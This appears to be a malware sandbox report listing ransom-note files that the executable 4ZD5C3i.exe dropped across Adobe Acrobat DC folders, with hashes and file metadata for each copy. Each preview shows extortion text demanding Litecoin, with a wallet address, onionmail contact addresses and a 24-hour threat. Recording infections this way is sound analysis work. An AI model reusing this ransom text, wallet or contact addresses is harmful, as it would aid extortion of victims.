                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\js\nls\hr-hr\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\js\nls\hu-hu\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\js\nls\it-it\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ja-jp\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ko-kr\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\js\nls\nb-no\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\js\nls\nl-nl\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\js\nls\pl-pl\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\js\nls\pt-br\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ro-ro\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\js\nls\root\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\prc\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\PMP\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Multimedia\MPP\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
